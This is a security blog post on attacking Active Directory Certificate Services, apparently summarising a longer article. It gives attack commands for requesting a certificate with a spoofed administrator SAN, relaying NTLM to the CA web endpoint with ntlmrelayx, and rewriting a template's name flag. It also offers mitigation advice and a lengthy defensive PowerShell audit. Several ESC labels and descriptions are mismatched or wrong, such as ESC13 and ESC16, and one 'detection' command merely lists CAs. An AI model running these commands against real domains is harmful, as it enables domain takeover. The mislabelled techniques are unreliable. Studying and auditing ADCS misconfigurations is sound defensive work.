Active Directory Certificate Services (ADCS) is a prime target for attackers due to misconfigurations and misunderstood certificate templates. This article covers exploitation techniques from ESC1 to ESC16, including real-world penetration testing examples and GOAD lab scenarios.
Read the full article here: Breaking ADCS: ESC1 to ESC16 Attack Techniques
You Should Know:
ESC1 Exploitation (Misconfigured Certificate Templates)
Attackers can request a certificate with arbitrary SAN (Subject Alternative Name) for domain escalation.
Steps:
1. Enumerate vulnerable templates:
# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (0x1) is a bit in msPKI-Certificate-Name-Flag, so test it with -band; hyphenated attribute names must be quoted when accessed on $_
Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties msPKI-Certificate-Name-Flag | Where-Object { ($_.'msPKI-Certificate-Name-Flag' -band 1) -ne 0 }
2. Request a certificate with a privileged SAN:
certreq.exe -submit -attrib "SAN:[email protected]" .\malicious_request.inf
ESC8 (NTLM Relay to ADCS HTTP Endpoint)
Exploiting HTTP-based enrollment for NTLM relay attacks.
Commands:
ntlmrelayx.py -t http://ca-server/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
ESC13 (Abuse Certificate Auto-Enrollment)
If users have auto-enrollment permissions, attackers can abuse it for persistence.
Detection:
# Enrollment Services objects live in the Configuration partition, so a SearchBase there is required; -Properties needs the attribute name
Get-ADObject -LDAPFilter "(objectClass=pKIEnrollmentService)" -SearchBase "CN=Configuration,DC=domain,DC=local" -Properties dNSHostName | Select-Object dNSHostName
ESC16 (Modifying Certificate Templates via ACL Abuse)
If a user has write permissions on a template, they can modify it for privilege escalation.
Exploit:
Set-ADObject -Identity "CN=TemplateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -Replace @{'msPKI-Certificate-Name-Flag' = 1}
Mitigation & Detection
- Disable unnecessary certificate templates.
- Restrict enrollment permissions.
- Monitor for abnormal certificate requests:
Get-WinEvent -LogName "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational" | Where-Object { $_.Id -eq 1001 }
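As an added defender-side example (not code from the article), the PowerShell audit below checks every published template for the ESC1 conditions listed above (enrollee-supplied subject, no manager approval, no RA signatures, a logon-capable EKU) and reports who holds the Enroll right on each, so that "restrict enrollment permissions" can be acted on. It assumes the RSAT ActiveDirectory module; the DC=domain,DC=local forest root is a placeholder, as in the article's own commands.

```powershell
# Added audit example (not the article's code). Assumes the RSAT ActiveDirectory module
# and a forest root of DC=domain,DC=local (placeholder, as in the article's commands).
Import-Module ActiveDirectory
$configNC   = 'CN=Configuration,DC=domain,DC=local'
$pkiDN      = "CN=Public Key Services,CN=Services,$configNC"
$templateDN = "CN=Certificate Templates,$pkiDN"
$caDN       = "CN=Enrollment Services,$pkiDN"

$ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag
$PEND_ALL_REQUESTS         = 0x2   # bit in msPKI-Enrollment-Flag (manager approval)
$ENROLL_RIGHT = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # "Enroll" extended right
$authEkus = @(
    '1.3.6.1.5.5.7.3.2',        # Client Authentication
    '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
    '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
    '2.5.29.37.0'               # Any Purpose
)
$broadGroups = 'Authenticated Users', 'Domain Users', 'Domain Computers', 'Everyone', 'Users'

function Get-Esc1Templates {
    # Only templates published on a CA can actually be requested.
    $published = Get-ADObject -SearchBase $caDN -LDAPFilter '(objectClass=pKIEnrollmentService)' `
                   -Properties certificateTemplates | ForEach-Object { $_.certificateTemplates }
    $props = 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature',
             'pKIExtendedKeyUsage', 'nTSecurityDescriptor'
    Get-ADObject -SearchBase $templateDN -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties $props |
      ForEach-Object {
        $t = $_
        $suppliesSubject = ($t.'msPKI-Certificate-Name-Flag' -band $ENROLLEE_SUPPLIES_SUBJECT) -ne 0
        $noApproval      = ($t.'msPKI-Enrollment-Flag' -band $PEND_ALL_REQUESTS) -eq 0
        $noSignatures    = -not $t.'msPKI-RA-Signature'        # 0 or absent
        # An empty EKU list means "any purpose", which still permits logon.
        $logonEku = (-not $t.pKIExtendedKeyUsage) -or
                    [bool]($t.pKIExtendedKeyUsage | Where-Object { $authEkus -contains $_ })
        if (-not ($suppliesSubject -and $noApproval -and $noSignatures -and $logonEku)) { return }

        # Who may enroll: an Allow ACE for the Enroll extended right, or GenericAll on the template.
        $enrollers = $t.nTSecurityDescriptor.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and (
              ($_.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -and $_.ObjectType -eq $ENROLL_RIGHT) -or
               $_.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll))
        } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
        $broad = @($enrollers | Where-Object { $broadGroups -contains $_.Split('\')[-1] })
        [pscustomobject]@{
            Template        = $t.Name
            Published       = $published -contains $t.Name
            BroadEnrollment = $broad.Count -gt 0    # low-privileged principals can enroll
            Enrollers       = $enrollers -join ', '
        }
      }
}

Get-Esc1Templates | Where-Object Published | Sort-Object BroadEnrollment -Descending | Format-Table -AutoSize
```

Rows with BroadEnrollment set are the ones to fix first: remove the enrollee-supplied-subject flag, require manager approval, or tighten the Enroll ACE to the intended group.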
What Undercode Say
ADCS attacks are evolving, and defenders must audit certificate templates, enforce least privilege, and monitor certificate issuance. Attackers will continue exploiting weak configurations, making proactive hardening essential.
Expected Output:
1. Vulnerable certificate templates identified.
2. Certificate issued with elevated privileges.
3. NTLM relay successful, DC compromise possible.
4. Detection logs show abnormal enrollment requests.
Prediction
ADCS attacks will increase as more organizations adopt certificate-based authentication without proper hardening. Expect more ESC variants leveraging template misconfigurations.
Reported By: Ivanspiridonov Breaking – Hackers Feeds